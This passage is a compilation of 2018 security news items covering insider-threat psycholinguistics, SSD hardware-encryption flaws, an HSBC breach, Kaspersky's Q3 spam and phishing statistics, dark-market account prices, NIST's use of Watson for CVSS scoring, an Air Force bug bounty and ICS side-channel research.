Using existing studies, such as the Diagnostic and Statistical Manual of Mental Disorders Vol. 5 (DSM-5), INSA provides a table of stressors and potentially linked CWBs. For example, emotional stress at the minor level could lead to repeated tardiness; at a more serious level it could lead to bullying co-workers and unsafe (dangerous) behavior. INSA's argument is that while individual CWBs might be missed by managers and HR, patterns -- and any escalation of stress indicators -- could be detected by ML algorithms. This type of user behavior analytics goes beyond anomalous network activity and seeks to recognize stressed user behavior that could lead to anomalous network activity before it happens.

But it still suffers from one weakness -- that is, where the stressors that affect the user's work occur entirely outside of the workplace; such as divorce, financial losses, or family illness. Here INSA proposes a more radical approach, but one that would work both inside and outside the workplace.

"In particular," it suggests, "sophisticated psycholinguistic tools and text analytics can monitor an employee's communications to identify life stressors and emotions and help detect potential issues early in the transformation process."

The idea is to monitor and analyze users' communications, which could include tweets and blogs. The analytics would look for both positive and negative words. An example is given. "I love food ... with ... together we ... in ... very ... happy." This sequence could easily appear in a single tweet; but the use of 'with', 'together', and 'in' would suggest an inclusive and agreeable temperament.

In fairness to doubters, INSA has done itself no favors with the misuse of a second example. Here Chelsea (formerly Bradley) Manning is quoted. "A second blog post," says INSA, "substantiates that Life Event and identifies an additional one, 'Relationship End/Divorce' with two mentions for each Life Event." The implication is that psycholinguistic analysis of this post would have highlighted the stressors in Manning's life and warned employers of the potential for malicious activity. The problem, however, is that the quoted section comes not from a Manning blog post before the event, but from the chat logs of his conversation with Lamo in May 2010 (see Wired) after WikiLeaks had started publishing the documents. The linguistic analysis in this case might have helped explain Manning's actions, but could do nothing to forewarn the authorities.

The point, however, is that psycholinguistic analysis has the potential to highlight emotional status, and over time, highlight individuals on an escalating likelihood of developing first minor CWBs and ultimately major CWBs. The difficulty is that it really is kind of creepy. That creepiness is acknowledged by INSA. "Use of these tools entails extreme care to assure individuals' civil or privacy rights are not violated," it says. "Only authorized information should be gathered in accordance with predefined policies and legal oversight and only used for clearly defined objectives. At no point should random queries or 'What If' scenarios be employed to examine specific individuals without predicate and then seek to identify anomalous bad behavior."

Users' decreasing expectation of privacy would suggest that sooner or later psycholinguistic analysis for the purpose of identifying potential malicious insiders before they actually become malicious insiders will become acceptable. In the meantime, however, it should be used with extreme caution and with the clear, unambiguous informed consent of users. What INSA is advocating, however, is an example of what law enforcement agencies have been seeking for many years: the ability to predict rather than just respond to bad behavior

Researchers Break Full-Disk Encryption of Popular SSDs
7.11.2018 securityweek

The encryption mechanism used by several types of solid state drives contains vulnerabilities that an attacker could exploit to access encrypted data without knowing a password.

The issues were discovered by Carlo Meijer and Bernard van Gastel from the Radboud University in the Netherlands and impact popular drives from Samsung and Crucial. The bugs impact both internal and external drives, the researchers explain in a paper (PDF).

Hardware encryption is meant to address weaknesses in software encryption and is performed on the drive itself, usually through a dedicated AES co-processor, with the drive’s firmware in charge of key management.

Full-disk encryption software could even switch off when hardware encryption is available, and rely solely on the latter. This is what Microsoft Windows’ BitLocker does, meaning that the data is not encrypted at all if hardware encryption fails.

When it comes to the implementation of a full-disk encryption scheme, there are pitfalls that should be avoided, such as not linking the user password and the disk encryption key (DEK), using a single DEK for the entire disk, or not using enough entropy in randomly generated DEKs.

Wear levelling could also prove an issue, if the DEK is initially stored unprotected and not overwritten after encryption. Similarly, DEVSLP (device sleep) could prove problematic, if the drive writes its internal state to non-volatile memory and the memory is not erased upon wake-up, as it would allow an attacker to extract the DEK from the last stored state.

The researchers investigated the security of various popular SSD models and discovered that their encryption schemes are impacted by one or more of these issues.

Crucial MX100 and MX200, for example, lack cryptographic binding between password and DEK, meaning that decryption is possible without actually providing the user-password. This is true for both ATA security and Opal standard implementations that are supported by the models.

“The scheme is essentially equivalent to no encryption, as the encryption key does not depend on secrets,” the researchers note.

The drives also support a series of vendor-specific commands that engineers use to interact with the device, but which need to be unlocked first. However, the researchers discovered it was trivial to unlock these commands, which allows for code execution on the device.

On the Samsung 840 EVO, a SATA SSD released in 2013, the ATA password may be cryptographically bound to the DEK, and no weakness was identified in the TCG Opal implementation, the researchers say. However, it would be possible to recover the DEK due to the wear levelling mechanism.

However, the ATA security mechanism can be tricked into revealing the drive content, and the issue was also found to impact the Samsung 850 EVO (released in 2014). The newer model isn’t vulnerable to the wear levelling attack either, and no weaknesses were found in the TCG Opal implementation either.

On the Samsung T3 USB external disk, however, there was no cryptographic binding between password and DEK, an issue present on the Samsung T5 portable as well.

“The results presented in this paper show that one should not rely solely on hardware encryption as offered by SSDs for confidentiality. We recommend users that depend on hardware encryption implemented in SSDs to employ also a software full-disk encryption solution, preferably an open-source and audited one,” the researchers note.

“A pattern of critical issues across vendors indicates that the issues are not incidental but structural, and that we should critically assess whether this process of standards engineering actually benefits security, and if not, how it can be improved,” they also point out.

The vulnerabilities were reported to the affected vendors half a year ago but made public only now. Samsung has publicly acknowledged the flaws and also issued firmware updates to address them on the portable SSDs.

HSBC Bank USA Warns Customers of Data Breach
7.11.2018 securityweek 

Unknown attackers were able to access online accounts of HSBC Bank USA users in the first half of October, the bank told customers in a letter.

The data breach happened between October 4 and October 14, and prompted the United States subsidiary of UK-based HSBC to block access to online accounts, to prevent further unauthorized access, the letter the bank sent to customers (PDF) reveals.

“When HSBC discovered your online account was impacted, we suspended online access to prevent further unauthorized entry of your account. You may have received a call or email from us so we could help you change your online banking credentials and access your account,” HSBC explains.

The notice also reveals the large amount of data that was exposed to the attackers when they accessed the online accounts.

“The information that may have been accessed includes your full name, mailing address, phone number, email address, date of birth, account numbers, account types, account balances, transaction history, payee account information, and statement history where available,” the letter reads.

Following the incident, the bank also decided to enhance the authentication process for HSBC Personal Internet Banking with the addition of an extra layer of security. The organization is also providing impacted customers with credit monitoring and identity theft protection.

Impacted customers are also advised to monitor their accounts for any unauthorized activity and to contact the bank if they notice anything suspicious. They should also place a fraud alert on their credit files, so that creditors would contact them before making any new operation.

Periodically obtaining credit reports and informing law enforcement of any suspicious activity should also help the bank’s users avoid losses.

This data breach is not the first cyber incident involving HSBC. Last year, the bank’s users were targeted with fake security software, while in 2016 a crippling distributed denial of service (DDOS) attack knocked its systems offline for hours.

Spam and phishing in Q3 2018
7.11.2018 Kaspersky
Phishing  Spam

Quarterly highlights
Personal data in spam
We have often said that personal data is candy on a stick to fraudsters and must be kept safe (that is, not given out on dubious websites). It can be used to gain access to accounts and in targeted attacks and ransomware campaigns.

In Q3, we registered a surge of fraudulent emails in spam traffic. This type of scam we have already reported at the beginning of the year. A ransom (in bitcoins) is demanded in exchange for not disclosing the “damaging evidence” concerning the recipients. The new wave of emails contained users’ actual personal data (names, passwords, phone numbers), which the scammers used to try to convince victims that they really had the information specified in the message. The spam campaign was carried out in several stages, and it is likely that the fraudsters made use of a range of personal information databases, as evidenced, for example, by the telephone number formats that varied from stage to stage.

Whereas before, the target audience was primarily English-speaking, in September we logged a spate of mailings in other languages, including German, Italian, Arabic, and Japanese.

The amount demanded by the ransomers ranged from a few hundred to several thousand dollars. To collect the payments, different Bitcoin wallets were used, which changed from mailing to mailing. In July, 17 transactions worth more than 3 BTC ($18,000 at the then exchange rate) were made to one of such wallets.

Transactions to scammers’ Bitcoin wallets

Also in Q3, we detected a malicious spam campaign aimed at corporate users. The main target was passwords (for browsers, instant messengers, email and FTP clients, cryptocurrency wallets, etc.). The cybercriminals attempted to infect victim computers with Loki Bot malware, concealing it in ISO files attached to messages. The latter were made to look like business correspondence or notifications from well-to-do companies.

Malicious spam attacks against the banking sector
The owners of the Necurs botnet, which in Q2 was caught sending malicious emails with IQY (Microsoft Excel Web Query) attachments, turned their attention to the banking sector and, like in Q2, used a non-typical file format for spam, this time PUB (Microsoft Publisher). Messages were sent to the email addresses of credit institutions in different countries, and the PUB file attachments contained Trojan loaders for downloading executable files (detected as Backdoor.Win32.RA-based) onto victim computers.

We observed that the owners of Necurs are making increasing use of various techniques to bypass security solutions and send malicious spam containing attachments with non-typical extensions so as not to arouse users’ suspicion.

New iPhone launch
Late Q3 saw the release of Apple’s latest gizmo. Unsurprisingly, it coincided with a spike in email spam from Chinese “companies” offering Apple accessories and replica gadgets. Links in such messages typically point to a recently created, generic online store. Needless to say, having transferred funds to such one-day websites, you lose your money and your goods are not arriving.

The release also went hand in hand with a slight rise in both the number of phishing schemes exploiting Apple (and its services) and messages with malicious attachments:

Classic pharma spam in a new guise
Spammers are constantly looking for ways to get round mail filters and increase the “deliverability” of their offers. To do so, they try to fabricate emails (both the contents and technical aspects) that look like messages from well-known companies and services. For example, they copy the layout of banking and other notifications and add bona fide headers in the fields that the user is sure to see.

Such techniques, typical of phishing and malicious campaigns, are being used more often in “classic spam” – for example, in messages offering prohibited medicines. For instance, this past quarter we detected messages disguised as notifications from major social networks, including LinkedIn. The messages contained a phoney link that we expected to point to a phishing form asking for personal data, but instead took us to a drug store.

This new approach is taken due to the fact that this type of spam in its traditional form has long been detectable by anti-spam solutions, so spammers started using disguises. We expect this trend to pick up steam.

Since the start of the academic year, scammers’ interest in gaining access to accounts on university websites has risen. We registered attacks against 131 universities in 16 countries worldwide. Cybercriminals want to get their hands on both personal data and academic research.

Fake login pages to personal accounts on university websites

Job search
To harvest personal data, attackers exploit the job-hunting efforts. Pages with application forms lure victims with tempting offers of careers in a big-name company, large salary, and the like.

Propagation methods
This quarter we are again focused on ways in which phishing and other illegitimate content is distributed by cybercriminals. But this time we also want to draw attention to methods that are gaining popularity and being actively exploited by attackers.

Scam notifications
Some browsers make it possible for websites to send notifications to users (for example, Push API in Chrome), and this technology has not gone unnoticed by cybercriminals. It is mainly deployed by websites that collaborate with various partner networks. With the aid of pop-up notifications, users are lured onto “partner” sites, where they are prompted to enter, for example, personal data. The owners of the resource receive a reward for every user they process.

By default, Chrome requests permission to enable notifications for each individual site, and so as to nudge the user into making an affirmative decision, the attackers state that the page cannot continue loading without a little click on the Allow button.

Having given the site permission to display notifications, many users simply forget about it, so when a pop-up message appears on the screen, they don’t always understand where it came from.

Notifications are tailored to the user’s location and displayed in the appropriate language

The danger is that notifications can appear when the user is visiting a trusted resource. This can mislead the victim as regards the source of the message: everything seems to suggest it came from the trusted site currently open. The user might see, for instance, a “notification” about a funds transfer, giveaway, or tasty offer. They all generally lead to phishing sites, online casinos, or sites with fake giveaways and paid subscriptions:

Examples of sites that open when users click on a notification

Clicking on a notification often leads to an online gift card generator, which we covered earlier in the quarter (it also works in the opposite direction: the resource may prompt to enable push notifications). Such generators offer visitors the chance to generate free gift card codes for popular online stores. The catch is that in order to get the generated codes, the visitor needs to prove their humanness by following a special link. Instead of receiving a code, the user is sent on a voyage through a long chain of partner sites with invitations to take part in giveaways, fill out forms, download stuff, sign up for paid SMS mailings, and much more.

The use of media resources is a rather uncommon, yet effective way of distributing fraudulent content. This point is illustrated by the story of the quite popular WEX cryptocurrency exchange, which prior to 2017 went by the name of BTC-E. In August 2018, fake news was inserted into thematic “third tier” Russian media saying that, due to internal problems, the exchange was changing its domain name to wex.ac:

The wex.nz administration soon tweeted (its tweets are published on the exchange’s home page) that wex.ac was just another imitator and warned users about transferring funds.

But that did not stop the scammers, who released more news about the exchange moving to a new domain. This time to the .sc zone:

Among the social media platforms used by scammers to distribute content, Instagram warrants a special mention. Only relatively recently have cybercriminals started paying attention to it. In Q3 2018, we came across many fake US Internal Revenue Service user accounts in this social network, as well as many others purporting to be an official account of one of the most widely-used Brazilian banks.

Fake IRS accounts on Instagram

Scammers not only create fakes, but seek access to popular accounts: August this year saw a wave of account hacking sweep through the social network. We observed accounts changing owners as a result of phishing attacks with “account verification” prompts – users themselves delivered their credentials on a plate in the hope of getting the cherished blue tick.

Back when scammers offered to “verify” accounts, there was no such function in the social network: the administration itself decided whom to award the sacred “badge.” Now it is possible to apply for one through the account settings.

Statistics: spam
Proportion of spam in email traffic

Proportion of spam in global email traffic, Q2 and Q3 2018 (download)

In Q3 2018, the largest share of spam was recorded in August (53.54%). The average percentage of spam in global mail traffic was 52.54%, up 2.88 p.p. against the previous reporting period.

Sources of spam by country

Sources of spam by country, Q3 2018 (download)

The three leading source countries for spam in Q3 were the same as in Q2 2018: China is in first place (13.47%), followed by the USA (10.89%) and Germany (10.37%). Fourth place goes to Brazil (6.33%), and fifth to Vietnam (4.41%). Argentina (2.64%) rounds off the Top 10.

Spam email size

Spam email size, Q2 and Q3 2018 (download)

In Q3 2018, the share of very small emails (up to 2 KB) in spam fell by 5.81 p.p. to 73.36%. The percentage of emails sized 5-10 KB increased slightly compared to Q2 (+0.76 p.p.) and amounted to 6.32%. Meanwhile, the proportion of 10-20 KB emails dropped by 1.21 p.p. to 2.47%. The share of 20-50 KB spam messages remained virtually unchanged, climbing a mere 0.49 p.p. to 3.17%.

Malicious attachments: malware families

Top 10 malicious families in mail traffic, Q3 2018 (download)

According to the results of Q3 2018, still the most common malware in mail traffic were objects assigned the verdict Exploit.Win32.CVE-2017-11882, adding 0.76 p.p. since the last quarter (11.11%). The Backdoor.Win32.Androm bot was encountered more frequently than in the previous quarter and ranked second (7.85%), while Trojan-PSW.Win32.Farei dropped to third place (5.77%). Fourth and fifth places were taken by Worm.Win32.WBVB and Backdoor.Java.QRat, respectively.

Countries targeted by malicious mailshots

Countries targeted by malicious mailshots, Q3 2018 (download)

The Top 3 countries by number of Mail Anti-Virus triggers in Q3 remain unchanged since the start of the year: Germany took first place (9.83%), with Russia in second (6.61%) and the UK in third (6.41%). They were followed by Italy in fourth (5.76%) and Vietnam in fifth (5.53%).

Statistics: phishing
In Q3 2018, the Anti-Phishing system prevented 137,382,124 attempts to direct users to scam websites. 12.1% of all Kaspersky Lab users worldwide were subject to attack.

Geography of attacks
The country with the highest percentage of users attacked by phishing in Q3 2018 was Guatemala with 18.97% (+8.56 p.p.).

Geography of phishing attacks, Q3 2018 (download)

Q2’s leader Brazil dropped to second place, with 18.62% of users in this country attacked during the reporting period, up 3.11 p.p. compared to Q2. Third and fourth places went to Spain (17.51%) and Venezuela (16.75%), with Portugal rounding off the Top 5 (16.01%).

Country %*
Guatemala 18,97
Brazil 18,62
Spain 17,51
Venezuela 16,75
Portugal 16,01
China 15,99
Australia 15,65
Panama 15,33
Georgia 15,10
Ecuador 15,03
* Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country

Organizations under attack
The rating of categories of organizations attacked by phishers is based on triggers of the Anti-Phishing component on user computers. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.
As in the previous quarter, the Global Internet Portals category was in first place, bumping its share up to 32.27% (+7.27 p.p.).

Distribution of organizations whose users were attacked by phishers, by category, Q3 2018 (download)

Only organizations that can be combined into a general Finance category were attacked more than global Internet portals. This provisional category accounted for 34.67% of all attacks (-1.03 p.p.): banks and payment systems had respective shares of 18.26% and 9.85%; only online stores (6.56%) had to concede fourth place to IT companies (6.91%).

In Q3 2018, the average share of spam in global mail traffic rose by 2.88 p.p. to 52.54%, and the Anti-Phishing system prevented more than 137 million redirects to phishing sites, up 30 million against the previous reporting period.

Spammers and phishers continue to exploit big news stories. This quarter, for instance, great play was made of the release of the new iPhone. The search for channels to distribute fraudulent content also continued. Alongside an uptick in Instagram activity, we spotted fake notifications from websites and the spreading of fake news through media resources.

A separate mention should go to the expanding geography of ransomware spam, featuring the use of victims’ real personal data.

Hey there! How much are you worth?
7.11.2018 Hacking

Kaspersky Have you ever stopped to think just how much your life is worth? I mean really think about it. For instance, let’s say you wanted to sell everything you have – your house, your car, your job, your private life, photos and home movies from your childhood, your accounts on various social media, your medical history and so on – how much would you ask for it all?

I thought about this myself and just the thought that someone else would be able to, for example, read the personal things I’ve written to friends, family and lovers on Facebook made me realize that those things are priceless. The same goes for someone getting access to my email and basically having the power to reset all my passwords for all the accounts I’ve registered using that email.

In the real non-digital world there are lots of insurance policies that cover things if they get damaged or stolen. If someone steals my car or I break my TV, I can replace them if they were insured. We don’t really have that option in the digital world, and our digital life contains some very personal and sentimental information. The big difference is that our digital lives can never be erased – what we’ve said or written, pictures we’ve sent, or orders we’ve made are basically stored forever in the hands of the service providers.

I decided to investigate the black market and see what kind of information is being sold there. We all know that you can buy drugs, weapons and stolen goods there, but you can also buy online identities. How much do you think your online identity is worth?

Hacked accounts
When investigating hacked accounts from popular services it’s almost impossible to compile valid data because there are so many black-market vendors selling this stuff. It is also difficult to verify the uniqueness of the data being sold. But one thing is certain – this is the most popular type of data being sold on the black market. When talking about data from popular services, I’m referring to things like stolen social media accounts, banking details, remote access to servers or desktops and even data from popular services like Uber, Netflix, Spotify and tons of gaming websites (Steam, PlayStation Network, etc.), dating apps, porn websites.

The most common way to steal this data is via phishing campaigns or by exploiting a web-related vulnerability such as an SQL injection vulnerability. The password dumps contain an email and password combination for the hacked services, but as we know most people reuse their passwords. So, even if a simple website has been hacked, the attackers might get access to accounts on other platforms by using the same email and password combination.

These kinds of attacks are not very sophisticated, but they are very effective. It also shows that cybercriminals are making money from hackers and hacktivists; the people selling these accounts are most likely not the people who hacked and distributed the password dump.

The price for these hacked accounts is very cheap, with most selling for about $1 per account, and if you buy in bulk, you’ll get them even cheaper.

Some vendors even give a lifetime warranty, so if one account stops working, you receive a new account for free. For example, below is a screenshot that shows a vendor selling Netflix accounts.

100 000 email and password combinations

250 000 email and password combinations

Passports and identity papers
When lurking around underground marketplaces I saw a lot of other information being traded, such as fake passports, driving licenses and ID cards/scans. This is where things get a bit more serious – most of the identity papers are not stolen, but they can be used to cause problems in the non-digital world.

People can use your identity with a fake ID card to acquire, for example, phone subscriptions, open bank accounts and so on.

Below is a screenshot of a person selling a registered Swedish passport, and the price is $4000. The same vendor was offering passports from almost all European countries.

Scammers’ toolbox
Most of the items being sold in the underground marketplaces are not new to me; they are all things the industry has been talking about for a very long time. What was interesting was the fact that stolen or fake invoices and other papers/scans such as utility bills were being sold.

People actually steal other people’s mail and collect invoices, for example, which are then used to scam other people. They will collect and organize these invoices by industry and country. The vendors then sell these scans as part of a scammer toolbox.

A scammer can use these scans to target victims in specific countries and even narrow their attacks down to gender, age and industry.

During the research I got to thinking about a friend’s (Inbar Raz) research on Tinder bots and, through my research, I managed to find links between stolen accounts and Tinder bots. These bots are used to earn even more money from stolen accounts. So, the accounts are not just sold on the black market, they are also used in other cybercriminal activities.

What’s interesting about the fake Tinder profiles is that they have the following characteristics in common that make them easy to identify:

Lots of matches all at once.
Most of the women look like super models.
No job title or education info.
Stolen Instagram pictures/images but with info stolen from Facebook accounts.
Scripted chat messages.
Most of the bots that I’ve researched are related to traffic redirection, clickbait, spam and things like that. So far, I haven’t seen any malware – most of the bots will try to involve you in other crime or to steal your data. Here’s an example of what it might look like.

The first step is that you’re matched with the bot. The bot doesn’t always contact you directly, but waits for you to interact with it before it replies. In some cases the introduction is scripted with some text about how it wants to show you nude photos or something similar and then it posts a link.

When you click on the link you go through several websites redirecting you in a chain. This chain does a lot of things, such as place cookies in your browser, enumerate your settings such as location, browser version and type and probably a lot more. This is done so that when you end up at the landing page they know which page to serve you. In my case, I came from a Swedish IP and the website I was offered was obviously in Swedish, which indicates that they are targeting victims globally.

These websites always have statements and quotes from other users. Most of the information used, including profile photos, name and age, is also taken from stolen accounts. The quote itself is obviously fake, but this approach looks very professional.

This particular website was asking for your email to sign up to a website which basically offered you a job. The actual campaign is called the ‘Profit Formula Scam’ and is a binary option auto-trading scam. It’s been covered in the media before, so I won’t go into any detail here.

People are generally very naive when it comes to their online identity, especially when it comes to services that don’t appear to affect their privacy in any way. I often hear people say that they don’t care if someone gets access to their account, for example, because they assume that the worst thing that can happen is that their account will be shared with someone they don’t know. But we need to understand that even if it all looks very innocent, we don’t know what the criminals do with the money they earn.

What if they are spending it on drugs or guns, which are then sold to teenagers? What if they finance platforms and servers to spread child porn? We need to understand that criminals often work together with other criminals, which means that maybe drugs are bought from the money they make from selling stolen Netflix accounts on the black market.

One of the most alarming things I noticed was how cheap everything was. Just think about the information someone could gather about you if they got access to your Facebook account – there is surely no way you would be okay with someone selling access to parts of your private life for one dollar.

But people use more than just Facebook. I would assume that most people aged between 15 and 35 have registered for over 20 different services and maybe use about 10 of them frequently. The services that you hardly ever use are a problem because you often forget that you even have an account there.

The most frequently used accounts probably include the likes of Facebook, Instagram, Skype, Snapchat, Tinder (or other dating services) email, and entertainment services such as Spotify, Netflix, HBO and YouTube. Besides this, you may have an account on a governmental or financial website such as your bank, insurance company, etc. We also need to remember that some of these services use Google or Facebook as authentication, which means you don’t use an email and password combination – you simply login with your Facebook or Google account.

Gaming Any type of gaming account, Steam, PSN, Xbox etc. $1 per account
Email Email and Password combination from various leaks. Most likely sold in bulk Various
Facebook Direct access to Facebook account $1 per account
Spotify Spotify premium account $2 per account
Netflix Netflix account $1-5 per account
Desktop Username and password for RDP services, including VNC $5-50 per account
Server Username and password for telnet/ssh $5-50 per account
Ecommerce Access to various ecommerce sites, including Airbnb and similar services $10 per account
When looking at the data it’s quite mind-blowing that you can basically sell someone’s complete digital life for less than $50 dollars. We’re not talking about getting access to bank accounts, but you do get access to services where a credit card might be included such as Spotify, Netflix, Facebook and others.

Besides just taking full control of someone’s digital life, access to these services is used by other criminals, for example, to spread malware or conduct phishing attacks.

The level of availability of these hacked or stolen accounts is very impressive; basically anyone with a computer can get access – you don’t have to be an advanced cybercriminal to know where to find them.

Flaws in several self-encrypting SSDs allows attackers to decrypt data they contain
6.11.2018 securityaffairs
Attack  Crypto  Vulnerebility

The encryption system implemented by popular solid-state drives (SSDs) is affected by critical vulnerabilities that could be exploited by a local attacker to decrypt data.
The flaws were discovered by researchers Carlo Meijer and Bernard van Gastel at Radboud University in the Netherlands, the duo discovered that it is possible to bypass password-based authentication to access to encrypted data stored on the drives.

Experts pointed out that encryption keys used to protect data are not derived from the owner’s password, this means that an attacker with a physical access to the drive could reprogram it via a debug port in order to accept any password. Once reprogrammed, the SSD will use its stored keys to cipher and decipher stored data.

The attack scenario devised by the experts was successfully tested on three Crucial and four Samsung models of SSDs, the researchers discovered that the devices failed in implementing the TCG Opal standard of encryption.

“We have analyzed the hardware full-disk encryption of several SSDs by reverse engineering their firmware. In theory, the security guarantees offered by hardware encryption are similar to or better than software implementations. In reality, we found that many hardware implementations have critical security weaknesses, for many models allowing for complete recovery of the data without knowledge of any secret.” reads the research paper published by the experts.

“BitLocker, the encryption software built into Microsoft Windows will rely exclusively on hardware full-disk encryption if the SSD advertises supported for it. Thus, for these drives, data protected by BitLocker is also compromised.”

Some SSDs fail to associate the owner’s password with the actual data encryption key (DEK), both secrets are stored in the drive. Normally the firmware on the storage use the DEK only after the owner has provided the correct password. Anyway, an attacker can reprogram the firmware to ignore the password and use the DEK.

Experts also discovered that many drives use a single DEK for the entire SSD, even if the vendors declare that the devices use different sections with different passwords.

The experts were able to modify the routine for the password-checking to accept any password before using the DEK to encrypt or decrypt the device.

With some SSD models, the experts were also able to retrieve the keys by modifying the firmware, in other cases, they were able to access to the key by exploiting a code injection vulnerability in the password routine.

In the following table are reported the results of the tests conducted by the experts on both Crucial and Samsung SSDs.
SSD test

“The analysis uncovers a pattern of critical issues across vendors. For multiple models, it is possible to bypass the encryption entirely, allowing for a complete recovery of the data without any knowledge of passwords or keys.” continues the paper.

“The situation is worsened by the delegation of encryption to the drive if the drive supports TCG Opal, as done by BitLocker. In such case, BitLocker disables the software encryption, relying fully on the hardware implementation. As this is the default policy, many BitLocker users are unintentionally using hardware encryption, exposing them to the same threats.”

The researchers suggest to store the decrypt key off the equipment, for example on the host using full-disk encryption software, and encrypts and decrypts data before it enters and after it accesses the drive using a key derived from a password provided by the user.

“The results presented in this paper show that one should not rely solely on hardware encryption as offered by SSDs for confidentiality,” the paper concluded.

“We recommend users that depend on hardware encryption implemented in SSDs to employ also a software full-disk encryption solution, preferably an open-source and audited one.”

The security duo suggests using VeraCrypt that allows for in-place encryption while the operating system is running, the encryption software can also coexist with hardware encryption.

“In particular, VeraCrypt allows for in-place encryption while the operating system is running, and can coexist with hardware encryption,” they said. “Furthermore, BitLocker users can change their preference to enforce software encryption even if hardware encryption is supported by adjusting the Group Policy setting.”

Let me suggest reading the research paper, it is very interesting.

IBM Watson will be used by NIST to assign CVSS scores to vulnerabilities
6.11.2018 securityaffairs

The National Institute of Standards and Technology (NIST) is planning to use Artificial Intelligence to assign the CVSS scores to reported vulnerabilities.
The Common Vulnerabilities and Exposures (CVE) system provides a reference-method for publicly known information-security vulnerabilities and exposures.

A Common Vulnerability Scoring System (CVSS) score between 0.0 and 10.0 that is assigned to each flaw according to its severity. The numerical score can then be associated with a qualitative representation (such as low, medium, high, and critical) to help organizations properly assess and prioritize the issue.

The NIST will use IBM’s Watson to automatically evaluate the level of severity for each reported vulnerability and assign a proper severity score.

The CVSS score depends on some factors such as the complexity of the attack for the exploitation of the flaw, the effect of the attack on confidentiality, integrity, and availability of the target system, the size of the audience impacted, whether the attack requires the user’s interaction, and whether the flaw could be exploited remotely.

Currently, the CVSS scores are assigned by experts at the NIST, but the organizations believe that the introduction of the AI could speed up the process and increase its efficiency.


According to Matthew Scholl, chief of the National Institute of Standards and Technology’s computer security division, the AI will replace human analysts by October 2019.

An analyst takes 5 up to 10 minutes to assign a score to a simple vulnerability, but the time could be far longer for more complex issues. Scholl pointed out that the number of vulnerabilities publicly disclosed is increasing with each passing year.

“Earlier this year, NIST launched a pilot program using IBM’s Watson artificial intelligence system to pore through hundreds of thousands of historical CVSS scores from the institute’s human analysts, Scholl said.” reported NextGov.

Watson used the data to build its experience and use it to assign scores to new vulnerabilities.

“We started it just to get familiar with AI, so we could get our hands on it, learn about it, kind of put it in a lab and experiment,” Scholl said. “As we were doing it with this dataset we said: ‘Hey, this seems to be putting out results the same as our analysts are putting out.’”

The scores assigned by Watson were similar to the ones provided by analysts for not complex flaws of for vulnerabilities with many similarities to previously reported ones.

“The Watson system is great at assigning scores for vulnerabilities where there’s a long paper trail of human-assigned scores for highly similar vulnerabilities. In those cases, the Watson score will be within the small range of variance between what two different human analysts would assign, say 7.2 versus 7.3 on a 10-point scale, Scholl said.” continues the NextGov.

“When the vulnerability is new and complex or highly novel, like the Specter vulnerability discovered in 2017, Watson fares far worse, Scholl said. In those cases, a human analyst will take over.”

IBM Watson also releases a confidence percentage for each CVSS score, when the percentage is under a specific threshold it is requested the analysis of a human analyst.

They are also looking into using the technology in other NIST areas.

U.S. Air Force Announces Third Bug Bounty Program
6.11.2018 securityweek

The United States Air Force on Monday announced that it has launched its third bug bounty program in collaboration with HackerOne.

Hack the Air Force 3.0 is the largest bug bounty program run by the U.S. government to date, spanning 191 countries and lasting more than four weeks.

The program started on October 19 and it will end no later than November 22. Up to 600 researchers who have registered will be invited to find vulnerabilities in Department of Defense applications that were recently migrated to a cloud environment owned by the Air Force.

Roughly 70 percent of the participants will be selected based on their HackerOne reputation score and the rest will be picked randomly.

The Pentagon claims it’s offering “competitive bounty awards,” with a minimum payout of $5,000 for critical vulnerabilities.

“Hack the AF 3.0 demonstrates the Air Forces willingness to fix vulnerabilities that present critical risks to the network,” said Wanda Jones-Heath, Air Force chief information security officer.

The first Hack the Air Force generated over 200 valid vulnerability reports, which earned researchers more than $130,000. In the second installment, the DoD paid out over $100,000 for 106 vulnerabilities discovered by 27 white hat hackers.

Last month, the DoD announced that the Hack the Marine Corps bug bounty program resulted in payouts totaling more than $150,000 for nearly 150 unique flaws.

The DoD recently informed bug bounty hunters that its “Hack the Pentagon” program will run all year long and will target the organization’s high-value assets. This initiative is powered by crowdsourced security platform Bugcrowd.

ICS Devices Vulnerable to Side-Channel Attacks: Researcher
6.11.2018 securityweek

Side-channel attacks can pose a serious threat to industrial control systems (ICS), a researcher warned last month at SecurityWeek’s ICS Cyber Security Conference in Atlanta, GA.

Demos Andreou, a lead engineer at power management company Eaton, has conducted an analysis of protection devices typically used in the energy sector, specifically in power distribution stations.

Side-channel attacks can be used to extract data from a system based on information gained by observing its physical implementation. There are several side-channel attack methods, but Andreou’s research looked at timing and power analysis attacks. These rely on the analysis of the time it takes to execute various computations, and the measurable changes in power consumption as the targeted device performs cryptographic operations, respectively.

The researcher says both timing and power analysis attacks can be launched against ICS devices. However, since timing attacks are easier to detect and block, he focused his research on power analysis.

While side-channel attacks have been known for a long time, few research papers describe their impact on industrial systems. It’s worth noting that the notorious Meltdown and Spectre side-channel attacks also affect ICS, but those methods involve only software and they rely on speculative execution, which helps speed up execution in modern CPUs.

Andreou told SecurityWeek in an interview that his goal is to raise awareness of the risks, show that attacks are not just theoretical, and that they could be conducted even with limited resources.

As part of his work at Eaton, Andreou conducts research into compliance and ethical penetration testing of industrial control systems and networks. Andreou and others help Eaton ensure that its products are secure and customer networks are not vulnerable to cyber threats.

Learn More About ICS Attacks at SecurityWeek’s ICS Cyber Security Conference

Power analysis attacks rely on the power consumption changes of semiconductors during clock cycles, the amount of time between two pulses shown by an oscilloscope. The signals form a power profile, which can provide clues on how the data is being processed.

For example, a password can be obtained one character at a time by observing the power profile when a correct character has been entered compared to an incorrect character. An encryption key can also be extracted using the same technique.

Andreou said he conducted successful experiments on protection devices from three major vendors, but he believes products from other companies are affected as well if the microprocessors they use are vulnerable to these types of attacks.

While the tested devices are 5-10 years old, the researcher says newer products likely have the same vulnerabilities, as these types of attacks were until recently only theoretical and it’s unlikely that vendors took measures to mitigate the risks. The availability of open source software and inexpensive hardware have made it much easier to conduct side-channel attacks.

Andreou showed that an attacker who has physical access to protection devices can use an oscilloscope and a specialized hardware device running open source software to obtain an encryption key. The hardware required for such attacks costs roughly $300, the researcher said.

ICS side channel attack diagram

In the case of the analyzed protection devices, an attacker can extract the encryption key and use it to make configuration changes. Since these systems are used to protect the power grid, changing their settings can have serious consequences, Andreou told SecurityWeek.

A malicious actor could cause the system to fail or have it send false data back to its operator. These devices are distributed and they are controlled by a master system. Incorrect readings from one device can have repercussions for a different part of the network.

